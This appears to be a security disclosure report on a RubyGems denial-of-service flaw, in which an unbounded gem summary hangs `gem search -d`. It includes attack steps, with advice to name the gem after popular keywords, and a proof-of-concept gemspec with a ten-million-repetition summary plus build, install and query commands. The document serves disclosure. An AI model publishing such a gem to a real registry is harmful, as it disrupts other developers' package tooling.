No limit of summary length allows Denail of Service

Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make `gem search` unavailable. This is not Arbitrary Code Execution, but really easy to attack. According to CVSS v3.0 Calculator, the severity is High (7.5). ## How to attack 1) An attacker creates a gem with huge summary string, and push it to rubygems.org. 2) A victim runs `gem search -d <substring-of-the-name-of-the-gem>`, but it will give no response. It may be good for the gem name to include a frequently-searched keyword, such as "foo-rails-bar" or "foo-sinatra-bar". ## Proof of concept 1) Prepare the following gemspec. ~~~~ Gem::Specification.new do |spec| spec.name = "huge-summary" spec.version = "0.0.1" spec.authors = ["Yusuke Endoh"] spec.email = ["[email protected]"] spec.summary = "foo" * 10000000 spec.homepage = "http://example.com/" spec.license = "MIT" end ~~~~ 2) Run the following commands ~~~~ gem build huge-summary.gemspec gem install huge-summary-0.0.1.gem ~~~~ 3) Run the following command. ~~~~ gem query huge-summary -d ~~~~ It will not answer.